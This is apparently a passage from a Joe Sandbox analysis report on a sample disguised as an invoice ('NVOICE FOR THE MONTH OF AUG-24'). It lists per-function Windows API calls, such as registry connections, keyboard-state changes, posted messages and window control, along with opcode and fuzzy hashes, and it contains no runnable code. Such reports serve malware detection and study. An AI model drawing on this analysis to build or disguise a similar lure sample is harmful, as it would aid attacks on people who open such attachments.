                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                          • String ID:
                                                          • API String ID: 1457242333-0
                                                          • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                          • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                          • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                          • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                          APIs
                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ConnectRegistry_memmove_wcslen
                                                          • String ID:
                                                          • API String ID: 15295421-0
                                                          • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                          • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                          • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                          • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                          APIs
                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                          • _wcstok.LIBCMT ref: 004675B2
                                                            • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                          • _wcscpy.LIBCMT ref: 00467641
                                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                          • _wcslen.LIBCMT ref: 00467793
                                                          • _wcslen.LIBCMT ref: 004677BD
                                                            • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                          • String ID: X
                                                          • API String ID: 780548581-3081909835
                                                          • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                          • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                          • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                          • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                          APIs
                                                            • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                            • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                            • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                          • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                          • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                          • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                          • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                          • CloseFigure.GDI32(?), ref: 0044751F
                                                          • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                          • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                          • String ID:
                                                          • API String ID: 4082120231-0
                                                          • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                          • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                          • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                          • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                          APIs
                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                          • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                          • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                          • String ID:
                                                          • API String ID: 2027346449-0
                                                          • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                          • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                          • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                          • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                          APIs
                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                          • GetMenu.USER32 ref: 0047A703
                                                          • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                          • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                          • _wcslen.LIBCMT ref: 0047A79E
                                                          • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                          • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                          • String ID:
                                                          • API String ID: 3257027151-0
                                                          • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                          • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                          • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                          • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                          APIs
                                                          • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastselect
                                                          • String ID:
                                                          • API String ID: 215497628-0
                                                          • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                          • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                          • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                          • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                          APIs
                                                          • GetParent.USER32(?), ref: 0044443B
                                                          • GetKeyboardState.USER32(?), ref: 00444450
                                                          • SetKeyboardState.USER32(?), ref: 004444A4
                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$Parent
                                                          • String ID:
                                                          • API String ID: 87235514-0
                                                          • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                          • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                          • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                          • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                          APIs
                                                          • GetParent.USER32(?), ref: 00444633
                                                          • GetKeyboardState.USER32(?), ref: 00444648
                                                          • SetKeyboardState.USER32(?), ref: 0044469C
                                                          • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                          • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                          • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                          • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$Parent
                                                          • String ID:
                                                          • API String ID: 87235514-0
                                                          • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                          • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                          • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                          • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                          APIs
                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                          • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                          • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                          • DeleteObject.GDI32(?), ref: 00455736
                                                          • DeleteObject.GDI32(?), ref: 00455744
                                                          • DestroyIcon.USER32(?), ref: 00455752
                                                          • DestroyWindow.USER32(?), ref: 00455760
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                          • String ID:
                                                          • API String ID: 2354583917-0
                                                          • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                          • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                          • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                          • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                          • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                          • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                          • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                          APIs
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                          • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                          • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                          • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                          • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                          • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                          • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Window$Enable$Show$MessageMoveSend
                                                          • String ID:
                                                          • API String ID: 896007046-0
                                                          • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                          • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                          • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                          • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                          APIs
                                                          • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                          • GetFocus.USER32 ref: 00448ACF
                                                          • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                          • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                          • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                          • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                          • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Window$Enable$Show$FocusMessageSend
                                                          • String ID:
                                                          • API String ID: 3429747543-0
                                                          • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                          • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                          • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                          • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                          • __swprintf.LIBCMT ref: 0045D4E9
                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                          • String ID: %lu$\VH
                                                          • API String ID: 3164766367-2432546070
                                                          • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                          • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                          • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
